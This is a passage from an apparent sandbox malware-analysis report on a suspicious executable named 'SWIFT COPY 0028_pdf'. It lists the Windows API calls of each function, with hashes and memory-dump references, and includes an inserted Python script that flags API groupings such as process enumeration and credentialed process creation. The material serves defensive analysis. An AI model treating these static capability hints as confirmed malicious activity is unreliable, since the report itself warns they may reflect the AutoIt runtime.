                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 642888154-0
                                                                                    • Opcode ID: e9017461e5af40504dc64a625d7003c8d778ca66d1036a3c837dc886fe029e6c
                                                                                    • Instruction ID: d2274698e15d366ba0ec983d1040942bd68fbad462ed9d9488426ac493322923
                                                                                    • Opcode Fuzzy Hash: e9017461e5af40504dc64a625d7003c8d778ca66d1036a3c837dc886fe029e6c
                                                                                    • Instruction Fuzzy Hash: E4415E30605140EFDB26DF34C4A9F947BE5BF09304F1881A9EA5D8F2B2C731A845DB91
                                                                                    APIs
                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 009698D1
                                                                                      • Part of subcall function 0093F4EA: std::exception::exception.LIBCMT ref: 0093F51E
                                                                                      • Part of subcall function 0093F4EA: __CxxThrowException@8.LIBCMT ref: 0093F533
                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00969908
                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00969924
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0096999E
                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 009699B3
                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 009699D2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                                    • String ID:
                                                                                    • API String ID: 2537439066-0
                                                                                    • Opcode ID: 00f5a0b2aebdf3f880167c7102ddb18e495c37a7bec92ff0d24913d27e010114
                                                                                    • Instruction ID: 43f95088e6bd8883d0ed295a834355a53976a256a732c66cfd82b864bf34096c
                                                                                    • Opcode Fuzzy Hash: 00f5a0b2aebdf3f880167c7102ddb18e495c37a7bec92ff0d24913d27e010114
                                                                                    • Instruction Fuzzy Hash: 3E316F31A00205EBDB10EFA4DC89EAEB778FF85710F1480A9F905AB256D774DE10DBA0
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,009777F4,?,?,00000000,00000001), ref: 00979B53
                                                                                      • Part of subcall function 00976544: GetWindowRect.USER32(?,?), ref: 00976557
                                                                                    • GetDesktopWindow.USER32 ref: 00979B7D
                                                                                    • GetWindowRect.USER32(00000000), ref: 00979B84
                                                                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00979BB6
                                                                                      • Part of subcall function 00967A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00967AD0
                                                                                    • GetCursorPos.USER32(?), ref: 00979BE2
                                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00979C44
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                    • String ID:
                                                                                    • API String ID: 4137160315-0
                                                                                    • Opcode ID: f403806cf8ee5ed35b0a02779c0e8658b517d2fec48bd4edfb481ad393a8ae21
                                                                                    • Instruction ID: f87ea44666e2001e57a184b3666b4ab9d3fcd86084f03e5c6e2cca6afebe11d7
                                                                                    • Opcode Fuzzy Hash: f403806cf8ee5ed35b0a02779c0e8658b517d2fec48bd4edfb481ad393a8ae21
                                                                                    • Instruction Fuzzy Hash: B831CE72508305AFD710DF54D849B9AB7EDFF89314F00091AF589D7191DA31EA08CB92
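                                                                                    The API lists in these function entries are the report's static evidence of what each routine can do, and the same handful of groupings (a Toolhelp32 process walk, RegOpenKeyExW plus RegEnumValueW, select followed by the wsock32 ordinal #16, mouse_event, CreateProcessWithLogonW) recur across them. The script below is an added example, not Joe Sandbox code and not part of this report: it parses the bullet format used in these listings and reports which of those groupings a function entry contains. The rule names and the groupings themselves are this example's own heuristics, and the sample input is copied from the listings above.

```python
"""Parse the 'APIs' listing of a Joe Sandbox function entry and flag
notable API groupings.

Added example for this report; it is not Joe Sandbox code. The line
format parsed is the one used in the listings on this page, e.g.
    • Process32FirstW.KERNEL32(00000000,?), ref: 00981C26
    • Part of subcall function 00941DFC: __wsplitpath_helper.LIBCMT ref: 00941E3C
The rule names and groupings in RULES are this example's own heuristics.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Bullet, optional "Part of subcall function <addr>:" prefix, API name
# (may contain '#', '::', '@'), optional ".MODULE", optional "(args)",
# then "ref: <hex call-site address>".
_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[#\w:@~]+)(?:\.(?P<mod>\w+))?(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass(frozen=True)
class Call:
    api: str
    module: Optional[str]
    args: Tuple[str, ...]
    ref: int               # address of the call site in the dumped image
    via_subcall: bool      # reached through a called function, not directly


def parse_listing(text: str) -> List[Call]:
    """Parse one function entry's API list; reject lines it does not understand."""
    calls: List[Call] = []
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped == "APIs":
            continue
        m = _LINE.match(line)
        if m is None:
            raise ValueError(f"unrecognised API line: {stripped!r}")
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        calls.append(Call(m["api"], m["mod"], args, int(m["ref"], 16), m["sub"] is not None))
    return calls


# Every API in a set must be present for the rule to fire. Labels are this
# example's own; '#16' is ordinal 16 of wsock32.dll, which is recv.
RULES: Dict[str, frozenset] = {
    "process enumeration (Toolhelp32)": frozenset(
        {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"}),
    "registry value enumeration": frozenset({"RegOpenKeyExW", "RegEnumValueW"}),
    "remote registry connection": frozenset({"RegConnectRegistryW"}),
    "socket receive (select + recv)": frozenset({"select", "#16"}),
    "synthetic mouse input": frozenset({"mouse_event"}),
    "process creation under other credentials": frozenset({"CreateProcessWithLogonW"}),
}


def match_rules(calls: List[Call]) -> Dict[str, List[Call]]:
    """Return rule name -> matching calls for every rule whose APIs all appear."""
    by_api: Dict[str, List[Call]] = {}
    for c in calls:
        by_api.setdefault(c.api, []).append(c)
    hits: Dict[str, List[Call]] = {}
    for name, required in RULES.items():
        if required.issubset(by_api):
            hits[name] = [c for api in sorted(required) for c in by_api[api]]
    return hits


# Sample input copied from two of the function listings on this page.
SAMPLE_PROCESS_ENUM = """APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00981C18
• Process32FirstW.KERNEL32(00000000,?), ref: 00981C26
• __wsplitpath.LIBCMT ref: 00981C54
  • Part of subcall function 00941DFC: __wsplitpath_helper.LIBCMT ref: 00941E3C
• _wcscat.LIBCMT ref: 00981C69
• Process32NextW.KERNEL32(00000000,?), ref: 00981CDF
• CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00981CF1
"""

SAMPLE_SOCKET_RECV = """• select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,009BDC00), ref: 00978E7C
• WSAGetLastError.WSOCK32(00000000), ref: 00978E89
• __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00978EAD
• #16.WSOCK32(?,?,00000000,00000000), ref: 00978EC5
• _strlen.LIBCMT ref: 00978EF7
• WSAGetLastError.WSOCK32(00000000), ref: 00978F6A
"""

if __name__ == "__main__":
    for sample in (SAMPLE_PROCESS_ENUM, SAMPLE_SOCKET_RECV):
        for name, hits in match_rules(parse_listing(sample)).items():
            print(f"{name}: " + ", ".join(f"{c.api}@{c.ref:08X}" for c in hits))
```

                                                                                    A hit says what the function can do, not that the script did it. The report classifies this binary as a compiled AutoIt script, and groupings like these typically correspond to the AutoIt runtime's built-in functions, which are present in every compiled AutoIt executable regardless of what the embedded script calls. Treat a static match as a lead and confirm it against the report's dynamic process, registry and network behaviour before recording it as observed activity.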
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0095AFAE
                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 0095AFB5
                                                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0095AFC4
                                                                                    • CloseHandle.KERNEL32(00000004), ref: 0095AFCF
                                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0095AFFE
                                                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 0095B012
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                    • String ID:
                                                                                    • API String ID: 1413079979-0
                                                                                    • Opcode ID: 7cbc1104efdc0eaa063ba87dd930b9ff3e37dc5f763db6e4fa087389178178b7
                                                                                    • Instruction ID: 35415bad21ff285dbca7b3d1b183b457bc3c1257663bc6bda98cb59482ebc9d5
                                                                                    • Opcode Fuzzy Hash: 7cbc1104efdc0eaa063ba87dd930b9ff3e37dc5f763db6e4fa087389178178b7
                                                                                    • Instruction Fuzzy Hash: AE2149B2105209AFDF02CFA5DD09BAE7BA9AF45305F044115FE02A2161C3769D29EBA1
                                                                                    APIs
                                                                                      • Part of subcall function 0093AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0093AFE3
                                                                                      • Part of subcall function 0093AF83: SelectObject.GDI32(?,00000000), ref: 0093AFF2
                                                                                      • Part of subcall function 0093AF83: BeginPath.GDI32(?), ref: 0093B009
                                                                                      • Part of subcall function 0093AF83: SelectObject.GDI32(?,00000000), ref: 0093B033
                                                                                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0098EC20
                                                                                    • LineTo.GDI32(00000000,00000003,?), ref: 0098EC34
                                                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0098EC42
                                                                                    • LineTo.GDI32(00000000,00000000,?), ref: 0098EC52
                                                                                    • EndPath.GDI32(00000000), ref: 0098EC62
                                                                                    • StrokePath.GDI32(00000000), ref: 0098EC72
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                    • String ID:
                                                                                    • API String ID: 43455801-0
                                                                                    • Opcode ID: 7634e9807e36bac5d9d36bdca4eca4d914d6ce082bd143fb273a66412904cdd1
                                                                                    • Instruction ID: 86ba89e07bbc0251c82f71c6434f869156d9dfead69a8f458a06ef70663dfef6
                                                                                    • Opcode Fuzzy Hash: 7634e9807e36bac5d9d36bdca4eca4d914d6ce082bd143fb273a66412904cdd1
                                                                                    • Instruction Fuzzy Hash: 28113972004158BFEB029F90DC88EEA7F6DEF09350F048012BA4989160C7719E55EBA0
                                                                                    APIs
                                                                                    • GetDC.USER32(00000000), ref: 0095E1C0
                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0095E1D1
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0095E1D8
                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0095E1E0
                                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0095E1F7
                                                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0095E209
                                                                                      • Part of subcall function 00959AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00959A05,00000000,00000000,?,00959DDB), ref: 0095A53A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                    • String ID:
                                                                                    • API String ID: 603618608-0
                                                                                    • Opcode ID: 83f9b26e780e36f370b36756ffe3f318b40596f3982e8af512006d1f1f76b2ba
                                                                                    • Instruction ID: b522ee440ac36817ac088d94415c6a0903f7f46a9f59813d55bdb4af31f10808
                                                                                    • Opcode Fuzzy Hash: 83f9b26e780e36f370b36756ffe3f318b40596f3982e8af512006d1f1f76b2ba
                                                                                    • Instruction Fuzzy Hash: 08018FB5A44614BFEB109FA68C45B5EBFB8EF49351F008066EE05A7290D6719D01CFA0
                                                                                    APIs
                                                                                    • __init_pointers.LIBCMT ref: 00947B47
                                                                                      • Part of subcall function 0094123A: __initp_misc_winsig.LIBCMT ref: 0094125E
                                                                                      • Part of subcall function 0094123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00947F51
                                                                                      • Part of subcall function 0094123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00947F65
                                                                                      • Part of subcall function 0094123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00947F78
                                                                                      • Part of subcall function 0094123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00947F8B
                                                                                      • Part of subcall function 0094123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00947F9E
                                                                                      • Part of subcall function 0094123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00947FB1
                                                                                      • Part of subcall function 0094123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00947FC4
                                                                                      • Part of subcall function 0094123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00947FD7
                                                                                      • Part of subcall function 0094123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00947FEA
                                                                                      • Part of subcall function 0094123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00947FFD
                                                                                      • Part of subcall function 0094123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00948010
                                                                                      • Part of subcall function 0094123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00948023
                                                                                      • Part of subcall function 0094123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00948036
                                                                                      • Part of subcall function 0094123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00948049
                                                                                      • Part of subcall function 0094123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0094805C
                                                                                      • Part of subcall function 0094123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0094806F
                                                                                    • __mtinitlocks.LIBCMT ref: 00947B4C
                                                                                      • Part of subcall function 00947E23: InitializeCriticalSectionAndSpinCount.KERNEL32(009DAC68,00000FA0,?,?,00947B51,00945E77,009D6C70,00000014), ref: 00947E41
                                                                                    • __mtterm.LIBCMT ref: 00947B55
                                                                                      • Part of subcall function 00947BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00947B5A,00945E77,009D6C70,00000014), ref: 00947D3F
                                                                                      • Part of subcall function 00947BBD: _free.LIBCMT ref: 00947D46
                                                                                      • Part of subcall function 00947BBD: DeleteCriticalSection.KERNEL32(009DAC68,?,?,00947B5A,00945E77,009D6C70,00000014), ref: 00947D68
                                                                                    • __calloc_crt.LIBCMT ref: 00947B7A
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00947BA3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                    • String ID:
                                                                                    • API String ID: 2942034483-0
                                                                                    • Opcode ID: ccde78d3cedfeb62b6a11e609800916e13cce83e46c1f3ca0c996a390b76e59d
                                                                                    • Instruction ID: 155504bd4dce9c54a455f25b9b86126481841d5accd9a243ac9afcf8ff86dabc
                                                                                    • Opcode Fuzzy Hash: ccde78d3cedfeb62b6a11e609800916e13cce83e46c1f3ca0c996a390b76e59d
                                                                                    • Instruction Fuzzy Hash: 9BF0E93211D31A1DEA287BF47C07F4BA7C8DF82734B200BAAF964D55E2FF20884155A1
                                                                                    APIs
                                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0092281D
                                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00922825
                                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00922830
                                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0092283B
                                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00922843
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0092284B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual
                                                                                    • String ID:
                                                                                    • API String ID: 4278518827-0
                                                                                    • Opcode ID: 66c1e8e777d2e56ff71e08ebad51f19f1c47f3bf7dfff5971bc9a62905fb436e
                                                                                    • Instruction ID: 59462f591e5667a0d1ddb759d1b248865624261de3554216a25a6a1500685ce3
                                                                                    • Opcode Fuzzy Hash: 66c1e8e777d2e56ff71e08ebad51f19f1c47f3bf7dfff5971bc9a62905fb436e
                                                                                    • Instruction Fuzzy Hash: A50167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C47A42C7F5A864CBE5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 1423608774-0
                                                                                    • Opcode ID: 5f8c806d46e5e6882ffa50d9ed85560053d1578370d4f996847151fd110722ac
                                                                                    • Instruction ID: d4f2fc7af4406b5f63816cfb26a237ed9f7cbcef3b557b609f4162d66248deb1
                                                                                    • Opcode Fuzzy Hash: 5f8c806d46e5e6882ffa50d9ed85560053d1578370d4f996847151fd110722ac
                                                                                    • Instruction Fuzzy Hash: EA01A436117211ABDB152B94ED48FEB77ADFFC9702B440429F903968A0DB749800EB90
                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00967C07
                                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00967C1D
                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00967C2C
                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00967C3B
                                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00967C45
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00967C4C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                    • String ID:
                                                                                    • API String ID: 839392675-0
                                                                                    • Opcode ID: d6cb116fc45cbdb0cd58ebd77ef7c854a96b82083a8e2412280c39359f1bd95e
                                                                                    • Instruction ID: ba68f53b6c0ba067c977c1b62627cb123b7d9ebed21290d2917e07f1b5d68bb0
                                                                                    • Opcode Fuzzy Hash: d6cb116fc45cbdb0cd58ebd77ef7c854a96b82083a8e2412280c39359f1bd95e
                                                                                    • Instruction Fuzzy Hash: B7F03A72256158BBE7215B929C0EEEF7B7CEFC7B15F040018FA0291451DBA05A41E6F5
                                                                                    APIs
                                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 00969A33
                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,00995DEE,?,?,?,?,?,0092ED63), ref: 00969A44
                                                                                    • TerminateThread.KERNEL32(?,000001F6,?,?,?,00995DEE,?,?,?,?,?,0092ED63), ref: 00969A51
                                                                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00995DEE,?,?,?,?,?,0092ED63), ref: 00969A5E
                                                                                      • Part of subcall function 009693D1: CloseHandle.KERNEL32(?,?,00969A6B,?,?,?,00995DEE,?,?,?,?,?,0092ED63), ref: 009693DB
                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00969A71
                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,00995DEE,?,?,?,?,?,0092ED63), ref: 00969A78
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 3495660284-0
                                                                                    • Opcode ID: 4b4f962c9fb243e0ffaae0c1be5eafbc164c374ed3c1a77f7ae46e23cb0d9dac
                                                                                    • Instruction ID: ab4814aca8141dcc7bc5e7591587460b0023078c5df8fe3c6185c0f8a5a21b38
                                                                                    • Opcode Fuzzy Hash: 4b4f962c9fb243e0ffaae0c1be5eafbc164c374ed3c1a77f7ae46e23cb0d9dac
                                                                                    • Instruction Fuzzy Hash: EEF0827615A211ABD7112BA4EC8DFEB777DFFC6302B140425F903958A4DB799801EB90
                                                                                    APIs
                                                                                      • Part of subcall function 0093F4EA: std::exception::exception.LIBCMT ref: 0093F51E
                                                                                      • Part of subcall function 0093F4EA: __CxxThrowException@8.LIBCMT ref: 0093F533
                                                                                    • __swprintf.LIBCMT ref: 00921EA6
                                                                                    Strings
                                                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00921D49
                                                                                    Similarity
